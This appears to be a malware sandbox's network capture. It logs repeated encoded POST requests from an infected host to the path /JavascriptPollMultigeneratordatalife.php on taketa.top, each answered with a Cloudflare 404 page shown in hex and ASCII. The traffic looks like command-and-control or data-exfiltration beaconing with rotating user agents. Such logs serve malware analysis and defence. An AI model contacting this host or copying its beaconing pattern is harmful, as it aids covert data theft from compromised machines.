25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css">.../--><![CDATA[/>.../ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/...*/--></style></head><body><h1>Object not found!</h1><p> The requ
Apr 26, 2024 05:18:13.744297981 CEST	560	IN	Data Raw: 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c Data Ascii: ested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p><p>If you think this is a server error, please contactthe <a href="/cdn-cgi/l/email-protecti
Apr 26, 2024 05:18:13.744333982 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.4	49742	104.21.16.102	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 05:18:16.044779062 CEST	273	OUT	POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: taketa.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Apr 26, 2024 05:18:16.193636894 CEST	25	IN	HTTP/1.1 100 Continue
Apr 26, 2024 05:18:16.201302052 CEST	344	OUT	Data Raw: 00 00 01 07 06 0b 04 07 05 06 02 01 02 0d 01 01 00 04 05 0e 02 05 03 00 02 52 0e 0c 05 0e 01 03 0f 54 06 5e 03 0d 04 00 0d 03 05 00 07 57 05 06 06 0b 0e 0a 0e 07 06 52 06 0e 05 00 06 56 00 00 03 07 0a 09 07 02 07 05 0d 06 0e 57 0a 04 0d 05 04 05 Data Ascii: RT^WRVWPUP\L~N~pzt[b\u\tB~\|[`B]Xkphl\|RZ{`vhnlNwYp}u~V@xST}bW
Apr 26, 2024 05:18:16.641925097 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 03:18:16 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Language: en CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fEwT1LNQ7rK6CyWoJPdlksGShMyaVLsgzTAEX9OQMkJAw7vf7AB4xilTcfqMCRgNF%2Bg6ZkT1egWaTP2%2B32js5UVI1EXF7pwoaLlo2bQhNjJ51rQ2bGyiBBuJniYR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a36caeba382245-MIA alt-svc: h2=":443"; ma=60 Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css">.../--><![CDATA[/>.../ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/...*/--></style></head><body><h1>Object not found!</h1><p> The requested
Apr 26, 2024 05:18:16.641968966 CEST	554	IN	Data Raw: 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 Data Ascii: URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p><p>If you think this is a server error, please contactthe <a href="/cdn-cgi/l/email-protection#0a2
Apr 26, 2024 05:18:16.642004013 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.4	49743	104.21.16.102	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 05:18:17.813792944 CEST	285	OUT	POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: taketa.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Apr 26, 2024 05:18:17.961420059 CEST	25	IN	HTTP/1.1 100 Continue
Apr 26, 2024 05:18:17.961812019 CEST	344	OUT	Data Raw: 00 07 01 00 06 0f 01 02 05 06 02 01 02 01 01 02 00 05 05 0c 02 03 03 0d 02 0e 0d 00 06 03 03 54 0f 02 07 0f 03 06 05 01 0b 07 05 01 04 02 05 02 05 03 0f 08 0f 52 07 0b 06 55 06 02 06 0b 06 08 03 07 0c 0f 05 54 04 04 0b 01 0b 04 0c 0d 0b 07 04 54 Data Ascii: TRUTTV\L~AkpXc[abu^AlqBcRlc`oUg{N~IkmZAwd\|}u~V@xmn~Le
Apr 26, 2024 05:18:18.402940035 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 03:18:18 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Language: en CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aEZOpWwslAVQ5cnbvpM3LtG4NG509ZVdZFozrx1dX5wsnff3oRwjyXdEVLL2sNzrOEt6wJyFlZEpiw2dnbs4r2GOVfNquqTU43K0Q6NhRmFWfqaKh8uzeC3Queau"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a36cb9c9375c7f-MIA alt-svc: h2=":443"; ma=60 Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css">.../--><![CDATA[/>.../ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/...*/--></style></head><body><h1>Object not found!</h1><p> The requested URL
Apr 26, 2024 05:18:18.402992964 CEST	550	IN	Data Raw: 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 Data Ascii: was not found on this server. If you entered the URL manually please check your spelling and try again. </p><p>If you think this is a server error, please contactthe <a href="/cdn-cgi/l/email-protection#9ebbabf
Apr 26, 2024 05:18:18.403137922 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.4	49744	104.21.16.102	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 05:18:22.668853998 CEST	285	OUT	POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: taketa.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Apr 26, 2024 05:18:22.816654921 CEST	25	IN	HTTP/1.1 100 Continue
Apr 26, 2024 05:18:22.816981077 CEST	344	OUT	Data Raw: 00 04 04 05 06 01 01 00 05 06 02 01 02 00 01 05 00 01 05 0e 02 06 03 0a 01 07 0e 03 03 0e 02 01 0f 53 03 0f 03 54 07 0b 0d 04 05 51 00 04 04 06 06 06 0d 01 0d 54 07 00 06 00 04 0d 05 0a 05 0e 00 05 0c 09 07 55 06 52 0f 57 0b 0e 0e 04 0c 52 06 06 Data Ascii: STQTURWRPRS\L}R\|Y~truBaKpAz\tlpMkphDol`_l`XDkRwgpu~V@{S~}\y
Apr 26, 2024 05:18:23.263287067 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 03:18:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Language: en CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62pg6uXYHVg9stmbUFpl3PdXJHdZDFv6iMHzjWAHQGYgOYIrvflXecCcF%2BgtuBkZ%2BIJwkIanMS0gKYHqgKsMOJVxzq9BSFJAmmBgcbZYbZMlHBtfPnKxuq2oCCnR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a36cd82feb8d9d-MIA alt-svc: h2=":443"; ma=60 Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css">.../--><![CDATA[/>.../ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/...*/--></style></head><body><h1>Object not found!</h1><p> The requested
Apr 26, 2024 05:18:23.263341904 CEST	554	IN	Data Raw: 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 Data Ascii: URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p><p>If you think this is a server error, please contactthe <a href="/cdn-cgi/l/email-protection#092
Apr 26, 2024 05:18:23.263380051 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	49745	104.21.16.102	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 05:18:49.422993898 CEST	321	OUT	POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: taketa.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Apr 26, 2024 05:18:49.571254015 CEST	25	IN	HTTP/1.1 100 Continue
Apr 26, 2024 05:18:49.571814060 CEST	344	OUT	Data Raw: 00 07 01 00 06 0f 01 05 05 06 02 01 02 0c 01 06 00 01 05 01 02 0d 03 09 02 55 0a 0c 03 0e 06 01 0c 56 04 0d 02 03 07 03 0c 00 07 50 05 53 07 00 03 00 0c 00 0d 50 05 07 05 00 04 0c 06 00 04 0d 02 03 0a 0d 06 07 06 04 0c 0f 0d 0f 0e 0c 0c 06 07 51 Data Ascii: UVPSPQP\L}Uh~caqufcS\|f\wBs\]w_{\|_xYjTsS`^w[iO~V@{m~bu
Apr 26, 2024 05:18:50.016786098 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 03:18:49 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Language: en CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TIGOFkDFozZloVjVSUhqmScus6gWZrgfNHJ7%2BF9II6zvco2VKDb1qejr%2BeimlBeU4KiDgM0C%2BE6VSMDqRbPclamE0kYte6OOmctN6bkajJ0N5KgsSat2vGrrdkTt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a36d7f5af00362-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css">.../--><![CDATA[/>.../ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/...*/--></style></head><body><h1>Object not found!</h1><p> The reque
Apr 26, 2024 05:18:50.016845942 CEST	559	IN	Data Raw: 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c Data Ascii: sted URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p><p>If you think this is a server error, please contactthe <a href="/cdn-cgi/l/email-protectio
Apr 26, 2024 05:18:50.016904116 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.4	49746	104.21.16.102	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 05:18:58.981677055 CEST	338	OUT	POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: taketa.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Apr 26, 2024 05:18:59.128940105 CEST	25	IN	HTTP/1.1 100 Continue
Apr 26, 2024 05:18:59.129264116 CEST	344	OUT	Data Raw: 00 02 04 00 03 08 01 0a 05 06 02 01 02 0d 01 0b 00 00 05 0a 02 01 03 00 02 04 0f 0d 04 57 02 07 0e 01 03 00 01 01 03 03 0b 05 02 07 06 01 04 04 05 03 0d 0f 0a 07 04 52 06 54 04 0d 05 07 06 08 05 06 0e 0f 06 0f 06 55 0e 01 0c 04 0e 03 0e 08 05 07 Data Ascii: WRTU[RQS\L~AhN[]tbv]bvToyBw`\|cw[lUsEx`TDkntAtY`O~_~V@z}zO~bW
